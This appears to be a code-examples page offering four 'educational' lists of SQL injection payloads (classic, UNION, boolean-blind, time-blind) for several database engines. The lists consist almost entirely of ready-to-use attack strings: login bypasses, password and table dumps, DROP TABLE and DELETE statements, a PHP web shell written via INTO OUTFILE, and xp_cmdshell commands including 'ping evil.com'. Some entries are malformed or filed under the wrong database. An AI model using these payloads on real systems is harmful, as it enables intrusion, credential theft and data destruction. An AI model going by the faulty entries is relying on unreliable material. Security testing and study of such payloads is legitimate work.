🎯 Рекомендуемые коллекции
Балансированные коллекции примеров кода из различных категорий, которые вы можете исследовать
Примеры SQL-инъекций
Образовательная коллекция нагрузок SQL-инъекций для тестирования безопасности, оценки уязвимостей и практики защитного кодирования
📝 Классические Паттерны SQL-инъекций sql
🟢 simple
⭐⭐
Фундаментальные методы SQL-инъекций - обход аутентификации, OR 1=1, UNION SELECT, инъекции на основе комментариев и перечисление баз данных
⏱️ 20 min
🏷️ sql, injection, database, security, bypass
# Classic SQL Injection Patterns
# Fundamental SQL injection techniques that form the basis for most attacks
# Authentication bypass with OR 1=1
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 'a'='a
" OR "a"="a
admin' OR '1'='1'--
admin" OR "1"="1"--
'or'1'='1
"or"1"="1
# Tautology-based injections (always true conditions)
' OR 1=1#
' OR 1=1--
' OR 1=1/*
" OR 1=1#
" OR 1=1--
' OR '1'='1'#
" OR "1"="1"#
admin' OR '1'='1'#
admin" OR "1"="1"#
# Comment-based injections to bypass remaining query
' OR 1=1--
' OR 1=1#
' OR 1=1/*
" OR 1=1--
" OR 1=1#
" OR 1=1/*
' OR '1'='1'--
" OR "1"="1"--
# Union select for data extraction
' UNION SELECT NULL--
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL, NULL--
" UNION SELECT NULL#
" UNION SELECT NULL, NULL#
" UNION SELECT NULL, NULL, NULL#
# Admin bypass with specific username
admin'--
admin'#
admin'/*
admin"--
admin"#
admin"/*
# Boolean-based testing
' AND 1=1--
' AND 1=2--
' AND '1'='1
" AND "1"="1
' AND 'a'='a
" AND "a"="a
# Order by enumeration (column counting)
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 4--
1' ORDER BY 5--
1' ORDER BY 6--
1' ORDER BY 7--
1' ORDER BY 8--
1' ORDER BY 9--
1' ORDER BY 10--
# Error-based injection attempts
' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CAST((SELECT table_name FROM information_schema.tables) AS int)--
' AND 1=(SELECT COUNT(*) FROM information_schema.tables)--
# Time-based injection basics
' WAITFOR DELAY '00:00:05'--
' AND SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
' OR pg_sleep(5)--
# Stacked queries (multiple statements)
'; DROP TABLE users--
'; DROP TABLE users#
' ; DROP TABLE users --
'; DELETE FROM users WHERE '1'='1
'; INSERT INTO users (username, password) VALUES ('hacker', 'pwned')--
# Database version extraction
' UNION SELECT @@version--
' UNION SELECT version()--
' UNION SELECT @@version, NULL, NULL--
' UNION SELECT version(), NULL, NULL, NULL--
# Table name enumeration
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT table_name, table_type FROM information_schema.tables--
' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema=database()--
# Column name enumeration
' UNION SELECT column_name FROM information_schema.columns--
' UNION SELECT column_name, data_type FROM information_schema.columns--
' UNION SELECT column_name, NULL, NULL FROM information_schema.columns WHERE table_name='users'--
# Data extraction from users table
' UNION SELECT username, password FROM users--
' UNION SELECT username, password, email FROM users--
' UNION SELECT NULL, username, password FROM users--
' UNION SELECT NULL, NULL, username, password FROM users--
# Bypassing login with comment truncation
admin'--
admin'#
admin'/*' OR '1'='1
admin'/*' OR '1'='1'--
# MySQL specific injections
' OR 1=1#
' OR 1=1--
' OR '1'='1'#
" OR "1"="1"#
' UNION SELECT database()#
' UNION SELECT user()#
' UNION SELECT @@version#
# SQL Server specific injections
' OR 1=1--
' UNION SELECT @@version--
' UNION SELECT db_name()--
' UNION SELECT system_user--
'; EXEC xp_cmdshell('dir')--
# Oracle specific injections
' OR '1'='1'--
' UNION SELECT banner FROM v$version--
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
# PostgreSQL specific injections
' OR 1=1--
' UNION SELECT version()--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns--
' OR pg_sleep(5)--
# SQLite specific injections
' OR '1'='1'--
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name, sql FROM sqlite_master WHERE type='table'--
# Access control bypass
' OR '1'='1' LIMIT 1--
' OR '1'='1' OR '1'='2--
admin' OR '1'='1'--
' OR user_id='admin'--
# Second-order injection (stored in database)
admin'; INSERT INTO logs (message) VALUES ('Hacked');--
admin'; DROP TABLE logs;--
# Blind SQL injection tests
' AND 1=1 AND '1'='1
' AND 1=2 AND '1'='1
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a
' AND ASCII(SUBSTRING((SELECT database()),1,1))>64
# Logic testing
' AND 1=1#
' AND 1=2#
' AND 1=1--
' AND 1=2--
' OR 1=1#
' OR 1=2#
# Encoding bypass attempts
%27%20OR%20%271%27%3D%271
%27%20UNION%20SELECT%20NULL--
\%27\%20OR\%20\%271\%27=\%27\%27
# HTTP parameter pollution
id=1' OR '1'='1&id=2
username=admin&username=' OR '1'='1
# Cookie-based injection
Cookie: sessionid=' OR '1'='1
Cookie: user_id=' UNION SELECT NULL--
# User-Agent injection
User-Agent: ' OR '1'='1
User-Agent: ' UNION SELECT @@version--
# Referer injection
Referer: ' OR '1'='1
Referer: ' UNION SELECT user()--
# X-Forwarded-For injection
X-Forwarded-For: ' OR '1'='1
X-Forwarded-For: ' UNION SELECT database()--📝 SQL-инъекции на основе UNION sql
🟡 intermediate
⭐⭐⭐
Продвинутые SQL-инъекции, использующие UNION SELECT для извлечения данных из других таблиц - перечисление столбцов, определение отпечатка базы данных и извлечение данных
⏱️ 25 min
🏷️ sql, union, injection, database, extraction
# UNION-based SQL Injection Vectors
# Advanced SQL injection using UNION SELECT to extract data from other tables
# Basic UNION syntax
' UNION SELECT NULL--
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL, NULL--
" UNION SELECT NULL#
" UNION SELECT NULL, NULL#
" UNION SELECT NULL, NULL, NULL#
# Column enumeration with ORDER BY
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 4--
1' ORDER BY 5--
1' ORDER BY 6--
1' ORDER BY 7--
1' ORDER BY 8--
1' ORDER BY 9--
1' ORDER BY 10--
# Database fingerprinting
' UNION SELECT @@version--
' UNION SELECT version()--
' UNION SELECT @@version, NULL--
' UNION SELECT version(), NULL, NULL--
' UNION SELECT @@version, NULL, NULL, NULL--
# Database name extraction
' UNION SELECT database()#
' UNION SELECT db_name()--
' UNION SELECT database(), NULL--
' UNION SELECT database(), NULL, NULL--
' UNION SELECT db_name(), NULL, NULL--
# Current user extraction
' UNION SELECT user()#
' UNION SELECT system_user--
' UNION SELECT current_user--
' UNION SELECT user(), NULL--
' UNION SELECT system_user, NULL--
# Table enumeration
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT table_name, NULL FROM information_schema.tables--
' UNION SELECT table_name, table_type FROM information_schema.tables--
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='public'--
# Column enumeration
' UNION SELECT column_name FROM information_schema.columns--
' UNION SELECT column_name, data_type FROM information_schema.columns--
' UNION SELECT column_name, NULL, NULL FROM information_schema.columns--
' UNION SELECT column_name, data_type, character_maximum_length FROM information_schema.columns--
# Column enumeration for specific table
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT column_name, data_type FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users' AND table_schema=database()--
# Data extraction from users table
' UNION SELECT username, password FROM users--
' UNION SELECT username, password, email FROM users--
' UNION SELECT username, password, NULL FROM users--
' UNION SELECT NULL, username, password FROM users--
' UNION SELECT username, password FROM users WHERE '1'='1--
# Data extraction with specific conditions
' UNION SELECT username, password FROM users WHERE username='admin'--
' UNION SELECT username, password FROM users WHERE id=1--
' UNION SELECT username, password FROM users WHERE user_id='admin'--
' UNION SELECT * FROM users--
# Multiple UNION operations
' UNION SELECT NULL, NULL UNION SELECT NULL, NULL--
' UNION SELECT username FROM users UNION SELECT password FROM users--
' UNION SELECT username FROM users UNION SELECT email FROM users UNION SELECT password FROM users--
# UNION with database functions
' UNION SELECT @@version, database(), user()--
' UNION SELECT version(), current_database(), current_user--
' UNION SELECT @@version, db_name(), system_user--
' UNION SELECT version(), database(), user(), NULL--
# UNION with string functions
' UNION SELECT concat(username, ':', password) FROM users--
' UNION SELECT concat_ws(':', username, password) FROM users--
' UNION SELECT username || ':' || password FROM users--
' UNION SELECT group_concat(username) FROM users--
# UNION with aggregate functions
' UNION SELECT COUNT(*) FROM users--
' UNION SELECT MAX(id), MIN(id) FROM users--
' UNION SELECT SUM(amount), AVG(amount) FROM transactions--
' UNION SELECT COUNT(DISTINCT username) FROM users--
# UNION with conditional logic
' UNION SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END--
' UNION SELECT CASE WHEN username='admin' THEN password ELSE NULL END FROM users--
' UNION SELECT IF(1=1, 'true', 'false')--
' UNION SELECT IIF(1=1, 'true', 'false')--
# UNION with subqueries
' UNION SELECT (SELECT password FROM users WHERE username='admin')--
' UNION SELECT (SELECT COUNT(*) FROM information_schema.tables)--
' UNION SELECT (SELECT table_name FROM information_schema.tables LIMIT 1)--
# UNION ALL to include duplicates
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL, NULL--
' UNION ALL SELECT username, password FROM users--
' UNION ALL SELECT username FROM users UNION ALL SELECT password FROM users--
# UNION DISTINCT to remove duplicates
' UNION DISTINCT SELECT username FROM users--
' UNION DISTINCT SELECT password FROM users--
' UNION DISTINCT SELECT email FROM users--
# MySQL specific UNION injections
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()#
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'#
' UNION SELECT concat(user, ':', password) FROM mysql.user#
' UNION SELECT grantee, privilege_type FROM information_schema.user_privileges#
# SQL Server specific UNION injections
' UNION SELECT name FROM sys.tables--
' UNION SELECT name FROM sys.columns WHERE object_id=OBJECT_ID('users')--
' UNION SELECT name, type_desc FROM sys.tables--
' UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'--
# Oracle specific UNION injections
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
' UNION SELECT banner FROM v$version--
' UNION SELECT owner, table_name FROM all_tables--
# PostgreSQL specific UNION injections
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='public'--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT datname FROM pg_database--
' UNION SELECT usename FROM pg_user--
# SQLite specific UNION injections
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name, sql FROM sqlite_master WHERE type='table'--
' UNION SELECT tbl_name FROM sqlite_master WHERE type='table'--
' UNION SELECT sql FROM sqlite_master WHERE type='index'--
# UNION with time delays
' UNION SELECT SLEEP(5)--
' UNION SELECT pg_sleep(5)--
' UNION SELECT WAITFOR DELAY '00:00:05'--
' UNION SELECT BENCHMARK(5000000, MD5(1))--
# UNION with file operations (MySQL)
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT 1,2,3 INTO OUTFILE '/var/www/html/shell.php'--
' UNION SELECT NULL, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php'--
# UNION with system commands (SQL Server)
' UNION SELECT NULL, NULL, NULL, EXEC xp_cmdshell('dir')--
' UNION SELECT NULL, NULL, NULL, EXEC master..xp_cmdshell 'ping evil.com'--
# Advanced data extraction techniques
' UNION SELECT group_concat(concat(username, ':', password)) FROM users--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 2--
# UNION with JOIN operations
' UNION SELECT u.username, u.password, r.role_name FROM users u JOIN roles r ON u.role_id = r.id--
' UNION SELECT t1.column1, t2.column2 FROM table1 t1 JOIN table2 t2 ON t1.id = t2.id--
# Error-based UNION injections
' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CAST((SELECT table_name FROM information_schema.tables) AS int)--
' AND 1=(SELECT COUNT(*) FROM information_schema.tables)--
# Blind UNION injections
' AND (SELECT COUNT(*) FROM information_schema.tables) > 5--
' AND (SELECT LENGTH((SELECT password FROM users WHERE username='admin'))) > 5--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 64--
' AND (SELECT SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) = 'a'--📝 Слепые SQL-инъекции на основе логических значений sql
🟡 intermediate
⭐⭐⭐
Слепые SQL-инъекции, эксплуатирующие условия истинности/ложности - перечисление баз данных, извлечение данных через булеву логику и условное тестирование
⏱️ 30 min
🏷️ sql, blind, boolean, injection, database
# Boolean-based Blind SQL Injection Vectors
# SQL injection techniques that exploit true/false conditions without returning data
# Basic boolean testing
' AND 1=1--
' AND 1=2--
' AND '1'='1
" AND "1"="1
' AND 'a'='a
" AND "a"="a
# Tautology-based boolean injections
' OR 1=1--
' OR '1'='1
" OR 1=1--
" OR "1"="1
admin' OR '1'='1'--
admin" OR "1"="1"--
# Contradiction-based boolean injections
' AND 1=2--
' AND '1'='2
" AND 1=2--
" AND "1"="2
admin' AND '1'='2'--
# Subquery boolean testing
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables) > 5--
' AND (SELECT COUNT(*) FROM information_schema.columns) > 10--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') = 1--
# Database name length checking
' AND LENGTH((SELECT database())) > 0--
' AND LENGTH((SELECT database())) > 5--
' AND LENGTH((SELECT database())) = 8--
' AND LENGTH((SELECT database())) < 10--
# Database name character by character extraction
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 64--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 96--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) = 115--
' AND ASCII(SUBSTRING((SELECT database()),2,1)) > 64--
' AND ASCII(SUBSTRING((SELECT database()),2,1)) = 101--
# Table name existence checking
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users') = 1--
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users') > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name LIKE 'user%') > 0--
# Table name length checking
' AND LENGTH((SELECT table_name FROM information_schema.tables LIMIT 1)) > 0--
' AND LENGTH((SELECT table_name FROM information_schema.tables LIMIT 1)) = 5--
' AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_name='users')) = 5--
# Column name existence checking
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE column_name='password') > 0--
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE column_name='username') > 0--
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' AND column_name='password') = 1--
# Data existence checking
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin' AND password='password123') > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') = 1--
# Password length checking
' AND LENGTH((SELECT password FROM users WHERE username='admin')) > 0--
' AND LENGTH((SELECT password FROM users WHERE username='admin')) = 32--
' AND LENGTH((SELECT password FROM users WHERE username='admin')) < 64--
# Password character by character extraction
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) > 64--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) = 97--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1)) > 64--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1)) = 98--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a'--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1) = 'b'--
# Version checking
' AND (SELECT LENGTH(VERSION())) = 23--
' AND ASCII(SUBSTRING(VERSION(),1,1)) > 48--
' AND ASCII(SUBSTRING(VERSION(),1,1)) = 53--
' AND SUBSTRING(VERSION(),1,1) = '5'--
# User checking
' AND (SELECT COUNT(*) FROM information_schema.users WHERE username='admin') > 0--
' AND (SELECT USER()) = 'root@localhost'--
' AND (SELECT CURRENT_USER()) = 'admin'@'%'--
# Privilege checking
' AND (SELECT COUNT(*) FROM information_schema.user_privileges WHERE grantee LIKE '%admin%') > 0--
' AND (SELECT super_priv FROM mysql.user WHERE user='root') = 'Y'--
' AND (SELECT is_role_enabled('admin')) = 1--
# File existence checking
' AND (SELECT COUNT(*) FROM information_schema.files WHERE file_name='/etc/passwd')) > 0--
' AND (SELECT file_exists('/etc/passwd')) = 1--
# Conditional error-based boolean
' AND (SELECT 1 FROM information_schema.tables) = 1--
' AND (SELECT 1 FROM users WHERE username='admin') = 1--
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables) > 0--
# Time-based boolean variations
' AND SLEEP(5)--
' AND pg_sleep(5)--
' AND WAITFOR DELAY '00:00:05'--
' AND BENCHMARK(5000000, MD5(1))--
# Case sensitivity testing
' AND BINARY('admin') = 'admin'--
' AND BINARY('ADMIN') = 'admin'--
' AND BINARY((SELECT username FROM users WHERE id=1)) = 'admin'--
# NULL testing
' AND (SELECT password FROM users WHERE username='admin') IS NULL--
' AND (SELECT COUNT(*) FROM users WHERE password IS NULL) > 0--
' AND (SELECT email FROM users WHERE username='admin') IS NOT NULL--
# Range-based boolean testing
' AND (SELECT COUNT(*) FROM users) BETWEEN 1 AND 100--
' AND (SELECT COUNT(*) FROM users) >= 10--
' AND (SELECT COUNT(*) FROM users) <= 1000--
' AND (SELECT id FROM users WHERE username='admin') BETWEEN 1 AND 100--
# Pattern matching boolean
' AND (SELECT username FROM users WHERE id=1) LIKE 'admin%'--
' AND (SELECT password FROM users WHERE username='admin') LIKE '%123%'--
' AND (SELECT email FROM users WHERE username='admin') LIKE '%@example.com'--
' AND (SELECT database()) LIKE 'test%'--
# String comparison boolean
' AND (SELECT database()) = 'testdb'--
' AND (SELECT username FROM users WHERE id=1) = 'admin'--
' AND (SELECT password FROM users WHERE username='admin') = 'password123'--
' AND (SELECT table_name FROM information_schema.tables LIMIT 1) = 'users'--
# Numeric comparison boolean
' AND (SELECT COUNT(*) FROM users) > 10--
' AND (SELECT id FROM users WHERE username='admin') = 1--
' AND (SELECT LENGTH(password) FROM users WHERE username='admin') = 32--
' AND (SELECT ASCII(SUBSTRING(password,1,1)) FROM users WHERE username='admin') = 97--
# Boolean logic combinations
' AND 1=1 AND 2=2--
' AND 1=1 AND 2=3--
' AND (1=1 OR 2=2) AND 3=3--
' AND ((1=1) OR (2=2)) AND (3=3 OR 4=4)--
# Nested boolean conditions
' AND ((SELECT COUNT(*) FROM users) > 0 AND (SELECT COUNT(*) FROM admins) > 0)--
' AND ((SELECT database()) = 'testdb' OR (SELECT database()) = 'devdb')--
' AND (LENGTH((SELECT password FROM users WHERE username='admin')) > 0 AND LENGTH((SELECT password FROM users WHERE username='admin')) < 64)--
# Boolean with GROUP BY
' AND (SELECT COUNT(*) FROM (SELECT username FROM users GROUP BY username) AS temp) > 0--
' AND (SELECT COUNT(DISTINCT username) FROM users) > 10--
# Boolean with HAVING
' AND (SELECT COUNT(*) FROM users GROUP BY username HAVING COUNT(*) > 1) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables GROUP BY table_schema HAVING COUNT(*) > 5) > 0--
# Boolean with ORDER BY
' AND (SELECT username FROM users ORDER BY username LIMIT 1) = 'admin'--
' AND (SELECT table_name FROM information_schema.tables ORDER BY table_name LIMIT 1) = 'accounts'--
# Boolean with LIMIT and OFFSET
' AND (SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0) = 'users'--
' AND (SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1) = 'accounts'--
' AND (SELECT username FROM users LIMIT 1 OFFSET 0) = 'admin'--
# Database-specific boolean injections
# MySQL
' AND (SELECT @@version) = '5.7.25'--
' AND (SELECT database()) = 'testdb'--
' AND (SELECT user()) = 'root@localhost'--
# SQL Server
' AND (SELECT @@version) LIKE '%SQL Server%'--
' AND (SELECT db_name()) = 'testdb'--
' AND (SELECT system_user) = 'dbo'--
# Oracle
' AND (SELECT banner FROM v$version WHERE ROWNUM=1) LIKE '%Oracle%'--
' AND (SELECT user FROM dual) = 'ADMIN'--
' AND (SELECT table_name FROM all_tables WHERE ROWNUM=1) = 'USERS'--
# PostgreSQL
' AND (SELECT version()) LIKE '%PostgreSQL%'--
' AND (SELECT current_database()) = 'testdb'--
' AND (SELECT current_user) = 'postgres'--
# SQLite
' AND (SELECT sql FROM sqlite_master WHERE type='table' LIMIT 1) LIKE '%users%'--
' AND (SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) = 'users'--📝 Слепые SQL-инъекции на основе времени sql
🔴 complex
⭐⭐⭐⭐
SQL-инъекции, использующие время отклика базы данных - SLEEP(), WAITFOR DELAY, BENCHMARK() и методы извлечения данных на основе времени
⏱️ 35 min
🏷️ sql, blind, time-based, injection, database
# Time-based Blind SQL Injection Vectors
# SQL injection techniques that use database response time to extract data
# Basic time-based injections
' WAITFOR DELAY '00:00:05'--
'; WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--
' OR SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
' OR pg_sleep(5)--
'; SELECT SLEEP(5)--
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
# MySQL time-based injections
' AND SLEEP(5)--
' OR SLEEP(10)--
' AND BENCHMARK(5000000, MD5(1))--
' AND BENCHMARK(50000000, MD5(1))--
' OR BENCHMARK(5000000, SHA1(1))--
' AND SLEEP(5) AND '1'='1
' AND SLEEP(10) AND 'a'='a
' OR SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
'; SELECT SLEEP(5)--
# SQL Server time-based injections
' WAITFOR DELAY '00:00:05'--
'; WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '00:00:10'--
'; WAITFOR DELAY '0:0:10'--
' AND WAITFOR DELAY '00:00:05'--
' OR WAITFOR DELAY '00:00:05'--
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
' OR DBMS_PIPE.RECEIVE_MESSAGE('x', 10)--
# PostgreSQL time-based injections
' OR pg_sleep(5)--
' AND pg_sleep(10)--
'; SELECT pg_sleep(5)--
' OR pg_sleep(10)--
' AND pg_sleep(5) AND '1'='1--
' OR pg_sleep(5) AND 'a'='a--
# Oracle time-based injections
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
' OR DBMS_PIPE.RECEIVE_MESSAGE('x', 10)--
' AND DBMS_LOCK.SLEEP(5)--
' OR DBMS_LOCK.SLEEP(10)--
'; EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
# SQLite time-based injections (using heavy queries)
' AND (SELECT COUNT(*) FROM (SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master))--
' AND (SELECT COUNT(*) FROM (SELECT * FROM sqlite_master CROSS JOIN sqlite_master CROSS JOIN sqlite_master))--
' AND (SELECT COUNT(*) FROM (SELECT * FROM users CROSS JOIN users CROSS JOIN users CROSS JOIN users CROSS JOIN users))--
# Database name extraction with time delays
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT database()),1,1))>64,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT current_database()),1,1))>64 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN ASCII(SUBSTRING((SELECT db_name()),1,1))>64 THEN '00:00:05' ELSE '00:00:00' END--
# Table name extraction with time delays
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0,5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0 THEN '00:00:05' ELSE '00:00:00' END--
# Data extraction with time delays
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64 THEN '00:00:05' ELSE '00:00:00' END--
# Character by character extraction with time
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT database()),1,1))=115,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT database()),1,1))=115 THEN 5 ELSE 0 END)--
' AND BENCHMARK(5000000, MD5(IF(ASCII(SUBSTRING((SELECT database()),1,1))=115,'true','false')))--
# Conditional time-based queries
' AND SLEEP(IF((SELECT COUNT(*) FROM users)>0,5,0))--
' AND SLEEP(IF((SELECT database())='testdb',5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)>5 THEN 5 ELSE 0 END)--
' AND WAITFOR DELAY CASE WHEN (SELECT COUNT(*) FROM users)>0 THEN '00:00:05' ELSE '00:00:00' END--
# Heavy query time delays for databases without sleep functions
' AND (SELECT COUNT(*) FROM (SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users) AS temp) > 0--
' AND (SELECT COUNT(*) FROM (SELECT * FROM information_schema.tables a CROSS JOIN information_schema.tables b CROSS JOIN information_schema.tables c) AS temp) > 0--
# Multiple time delays for confirmation
' AND SLEEP(5) AND SLEEP(5)--
' AND pg_sleep(5) AND pg_sleep(5)--
' WAITFOR DELAY '00:00:05' WAITFOR DELAY '00:00:05'--
' AND BENCHMARK(5000000, MD5(1)) AND BENCHMARK(5000000, MD5(1))--
# Variable time delays for bit extraction
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 128)=128,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 64)=64,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 32)=32,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 16)=16,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 8)=8,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 4)=4,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 2)=2,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 1)=1,5,0))--
# Time-based data length extraction
' AND SLEEP(IF(LENGTH((SELECT database()))>5,5,0))--
' AND pg_sleep(CASE WHEN LENGTH((SELECT database()))>5 THEN 5 ELSE 0 END)--
' AND SLEEP(IF(LENGTH((SELECT password FROM users WHERE username='admin'))>10,5,0))--
# Time-based counting queries
' AND SLEEP(IF((SELECT COUNT(*) FROM users)>10,5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)>5 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN (SELECT COUNT(*) FROM users)>0 THEN '00:00:05' ELSE '00:00:00' END--
# Time-based version detection
' AND SLEEP(IF(SUBSTRING(VERSION(),1,1)='5',5,0))--
' AND pg_sleep(CASE WHEN SUBSTRING(VERSION(),1,1)='9' THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN @@VERSION LIKE '%SQL Server%' THEN '00:00:05' ELSE '00:00:00' END--
# Time-based user privilege detection
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.user_privileges WHERE grantee LIKE '%admin%')>0,5,0))--
' AND pg_sleep(CASE WHEN (SELECT super_priv FROM mysql.user WHERE user='root')='Y' THEN 5 ELSE 0 END)--
# Time-based file existence check
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.files WHERE file_name='/etc/passwd'))>0,5,0))--
' AND pg_sleep(CASE WHEN (SELECT file_exists('/etc/passwd'))=1 THEN 5 ELSE 0 END)--
# Advanced time-based techniques
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) BETWEEN 97 AND 122,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT database()),1,1)) IN (115, 116, 117) THEN 5 ELSE 0 END)--
' AND SLEEP(IF((SELECT database()) LIKE 't%',5,0))--
' AND pg_sleep(CASE WHEN (SELECT database()) LIKE '%test%' THEN 5 ELSE 0 END)--
# Time-based with mathematical operations
' AND SLEEP(IF((SELECT COUNT(*) FROM users)*2>10,5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)/2>3 THEN 5 ELSE 0 END)--
' AND SLEEP(IF(LENGTH((SELECT database()))*2>10,5,0))--
# Stacked queries with time delays
'; SELECT SLEEP(5)--
'; WAITFOR DELAY '00:00:05'--
'; SELECT pg_sleep(5)--
'; EXEC('WAITFOR DELAY ''00:00:05''')--
'; EXEC('SELECT SLEEP(5)')--
